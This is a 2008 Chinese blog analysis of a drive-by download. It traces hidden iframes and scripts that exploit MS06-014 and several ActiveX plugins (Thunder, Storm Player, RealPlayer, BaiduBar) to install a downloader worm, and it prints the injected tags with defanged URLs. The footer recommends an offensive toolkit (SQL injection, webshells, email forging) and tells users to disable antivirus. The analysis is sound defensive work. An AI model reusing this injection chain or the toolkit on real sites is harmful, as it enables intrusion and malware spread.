自动进入" 天眼通官网 "?其实是自动种马网(Worm.Win32.Downloader.kb)

自动进入" 天眼通官网 "?其实是自动种马网(Worm.Win32.Downloader.kb)

endurer 原创
2008-05-09 第1

在网页hxxp://www.z*j***5*0.***.cn/c*f**.asp?user_name=pp365pp上发现代码:

/---
<iframe width=0 height=0 src="hxxp://www.v*h***68.***.cn/lj/lfad.html?ad05"></iframe>
---/

#1 hxxp://www.v*h***68.***.cn/lj/lfad.html?ad05 包含代码:
/---
<iframe src="news.html" width=100 height=0></iframe>
---/

#1.1 hxxp://www.v*h***68.***.cn/lj/news.html

输出代码:
/---
<script src=hxxp://www.v*h***68.***.cn/lj/ms06014.js></script>
<iframe width=100 height=0 src=hxxp://www.v*h***68.***.cn/lj/Thunder.html></iframe>
<iframe style=display:none src="hxxp://www.v*h***68.***.cn/lj/GLWORLD.html"></iframe>
<iframe style=display:none src="hxxp://www.v*h***68.***.cn/lj/StormII.html"></iframe>
<sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://www.v*h***68.***.cn/lj/real.js></script>
<iframe style=display:none src="hxxp://www.v*h***68.***.cn/lj/Real.html"></iframe>
---/

#1.1.1 hxxp://www.v*h***68.***.cn/lj/ms06014.js

利用MS06-014漏洞下载 hxxp://www.v*h***68.***.cn/lj/svhost.exe

文件说明符 : D:/test/svhost.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-9 21:30:14
修改时间 : 2008-5-9 21:30:14
大小 : 24596 字节 24.20 KB
MD5 : cf2f307f4913ccc9204a2c0c9a8896c8
SHA1: 1917436C7FCA0E5879924B0782CE7F4843B6359C
CRC32: 89e52725

卡巴斯基报为:Worm.Win32.Downloader.kb,瑞星20.43.42没反应。

#1.1.2 hxxp://www.v*h***68.***.cn/lj/Thunder.html

利用迅雷(DPClient.Vod,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.v*h***68.***.cn/lj/svhost.exe

#1.1.3 hxxp://www.v*h***68.***.cn/lj/GLWORLD.html

利用联众(GLIEDown.IEDown.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://www.v*h***68.***.cn/lj/svhost.exe

#1.1.4 hxxp://www.v*h***68.***.cn/lj/StormII.html

利用暴风影音(MPS.StormPlayer.1,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载hxxp://www.v*h***68.***.cn/lj/svhost.exe

#1.1.5 hxxp://www.v*h***68.***.cn/lj/real.js

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://www.v*h***68.***.cn/lj/svhost.exe

#1.1.6 hxxp://www.v*h***68.***.cn/lj/Real.html

利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载hxxp://www.v*h***68.***.cn/lj/svhost.exe

#1.1.7 利用 BaiduBar.Tool 下载 hxxp://www.v*h***68.***.cn/lj/svhost.cab,内含 svhost.exe

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MX Player Pro是欣赏电影的最佳方式。功能强大的视频 播放器, 具有先进的硬件加速和字幕支持。 a)硬件加速 - 借助新的H / W解码器,可以将硬件加速应用于更多视频。 b)多核解码 - MX Player是第一款支持多核解码的Android视频播放器。测试结果证明,双核设备的性能比单核设备高出70%。 c)键入缩放,缩放和平移 - 过在屏幕上捏合和滑动轻松放大和缩小。还可以选择缩放和平移。 d)SUBTITLE GESTURES - 向前/向后滚动以移至下一个/上一个文本,向上/向下滚动以上下移动文本,放大/缩小以更改文本大小。 e)儿童锁 - 让您的孩子享受娱乐,而不必担心他们可以打电话或触摸其他应用程序。(需要插件) 您可能也喜欢:GetTube - YouTube Downloader&Player Final Mod APK 字幕格式: DVD,DVB,SSA / ASS字幕轨道。 具有完整样式的SubStation Alpha(.ssa / .ass)。 SAMI(.smi)支持ruby标记。 SubRip(.SRT) 成为MicroDVD(.SUB) VobSub的(.SUB / .IDX) SubViewer2.0(.SUB) MPL2(名为.mpl) PowerDivX(.psb) TMPlayer文件(.txt) 图文 PJS(.pjs) WebVTT插入(.vtt) MOD LITE INFO 优化的图形/ Zipalign; 已禁用/已删除不需要的权限+接收方和服务; Analytics / Crashlytics已停用; 删除了启动Google Consent; 语言:多语言。 COLOR MOD信息: 用彩色图标替换所有活动图标 最好在黑暗主题中使用所有活动按钮(设置/ 播放器 /导航/按钮✔) 触摸屏幕时触摸智能锁中的图标(图片)(触摸效果) 重命名为 MX Video 替换图标 应用优化
1)站目录扫描 站后台目录扫描工具,调用外部核心扫描站后台目录,无视服务器自定义404、403错误! 支持ASP,ASPX.PHP,JSP等程序类型的站. 2) 服务端口扫描 一个端口就是一个潜在的道,也就是一个**道。对目标计算机进行端口扫描,能得到许多有用的信息。进行扫描的方法很多,可以是 手工进行扫描,也可以用端口扫描软件进行,还有就是本站的在线扫描。 过端口扫描,可以得到许多有用的信息,从而发现系统的安全漏洞,或者是系统所开放的服务。 3)SQL注入 如果要对一个站进行SQL注入攻击,首先就需要找到存在SQL注入漏洞的地方,也就是寻找所谓的注入点。可能的SQL注入点一般存在于登录页面、 查找页面或添加页面等用户可以查找或修改数据的地方。 4)旁注 旁注是络上比较流行的一种**方法,在字面上解释就是-"从旁注入",利用同一主机上面不同站的漏洞得到webshell,从而利用主机上 的程序或者是服务所暴露的用户所在的物理路径进行** 辅助及其他功能: 渗透笔记、邮件伪造、社工库查询、远程桌面、页抓包、络连接、SHELL破解、二级域名爆破.各类脚本程序等功能... 注意:本工具 具有一定的攻击性,所以相关杀毒软件可能会对此误报;本软件集成工具不存在病毒后门行为,请在使用之前暂时关闭或卸载该反病毒软件.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值